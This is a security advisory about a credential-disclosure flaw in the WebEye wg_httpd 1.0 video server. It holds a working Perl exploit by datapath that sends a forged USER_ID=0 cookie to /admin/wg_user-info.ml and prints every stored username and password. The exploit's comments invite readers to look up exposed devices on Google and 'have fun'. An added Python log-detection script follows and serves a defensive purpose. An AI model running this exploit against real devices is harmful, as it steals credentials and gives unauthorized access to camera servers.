WebEye "provides a quick and easy operation in accessing WebEye families (web cameras and web servers) that generates live images". A vulnerability in the product allows an attacker to gather a list of usernames and passwords configured in the server without needing any special privileges.
Credit:
The information has been provided by datapath.
Vulnerable systems:
* wg_httpd version 1.0 (based on Boa version 0.92q)
Exploit:
#!/usr/bin/perl
####################################################################
# Author: datapath
# E-mail: datapath@softhome.net
# Date: Dec 2003
# 44c545672ac14e9e0f968b3affcd0740
# WHAT IS THIS?
# This is an exploit to retrieve all usernames and passwords from a
# webeye video server.
# REQUIREMENTS
# It requires some perl libraries. If you don't have them already
# installed, search cpan.org.
# HOW DOES IT WORK?
# Well, it's very simple, because the server provides a mechanism (not
# documented) to retrieve all passwords! You can read the code below,
# it's short and simple.
# If you think it's fun, but don't know any webeye video server, just make a
# search in Google. You will find a lot of them! Have fun!
###########################################################################
use LWP::UserAgent;
use HTTP::Cookies;
$host=shift;
$port=shift;
if ($host eq "") {
print "Usage: webeye-xp.pl <host name> [port]\n";
exit;
}
if ($port eq "")
{
$port = "80";
}
my $browser = LWP::UserAgent->new();
my $resp = $browser->get("http://$host\:$port/admin/wg_user-info.ml","Cookie","USER_ID=0; path=/;");
# print "resp: $resp\n";
$t = $resp->content;
# print "t: $t\n";
$i = index($t,"<tr");
substr($t,0,$i+1,"");
while ($i!=-1) {
$i = index($t,"<tr");
substr($t,0,$i+1,"");
$i = index($t,"value=");
substr($t,0,$i+7,"");
$j = index($t,"\"");
$user = substr($t,0,$j);
if ($user =~ /Apply/) { print "\nHave fun!\n"; exit; }
print "user: ".$user;
$i = index($t,"value=");
substr($t,0,$i+7,"");
$j = index($t,"\"");
print "\tpass: ".substr($t,0,$j)."\n";
}
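
Detection: the request made by the exploit above (the path /admin/wg_user-info.ml, optionally with the cookie USER_ID=0) can be looked for in the logs of a proxy placed in front of the device. The Python below is an added example, not part of the original advisory or of datapath's code; the log layout (combined format with the Cookie header appended as a last field), the admin network 10.0.0.0/24, the function name and the sample lines are assumptions.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import unquote

# Path and cookie value are the ones the exploit on this page sends.
USER_PAGE = "/admin/wg_user-info.ml"
EXPLOIT_COOKIE = re.compile(r"(?:^|;\s*)USER_ID=0\s*(?:;|$)")

# Assumed layout: combined log format plus the Cookie header as a last quoted
# field, as written by a logging reverse proxy in front of the device.
LINE = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"'
)

def find_user_list_reads(lines, admin_nets=("10.0.0.0/24",)):
    """Report requests for the user page that come from outside admin_nets."""
    nets = [ip_network(n) for n in admin_nets]
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        # Decode %xx escapes and drop the query string before comparing.
        path = unquote(m["uri"].split("?", 1)[0])
        if path != USER_PAGE:
            continue
        try:
            trusted = any(ip_address(m["src"]) in n for n in nets)
        except ValueError:  # the log holds a hostname, not an address
            trusted = False
        if not trusted:
            hits.append({
                "src": m["src"],
                "time": m["ts"],
                "served": m["status"] == "200",  # server answered 200 OK
                "exploit_cookie": bool(EXPLOIT_COOKIE.search(m["cookie"])),
                "agent": m["ua"],
            })
    return hits

# Constructed sample lines (documentation addresses, invented timestamps).
SAMPLE = [
    '10.0.0.5 - - [12/Dec/2003:09:01:11 +0000] "GET /admin/wg_user-info.ml HTTP/1.1" 200 1843 "-" "Mozilla/4.0" "USER_ID=0"',
    '198.51.100.7 - - [12/Dec/2003:10:15:02 +0000] "GET /admin/wg_user-info.ml HTTP/1.0" 200 1843 "-" "libwww-perl/5.69" "USER_ID=0; path=/;"',
    '198.51.100.7 - - [12/Dec/2003:10:15:09 +0000] "GET /index.html HTTP/1.0" 200 512 "-" "libwww-perl/5.69" "-"',
    '203.0.113.9 - - [12/Dec/2003:11:40:27 +0000] "GET /admin/%77g_user-info.ml?x=1 HTTP/1.0" 403 210 "-" "-" "-"',
]
```

A hit with "served" set means the account list was returned to an address outside the admin network, so every password configured on that device should be treated as disclosed and changed.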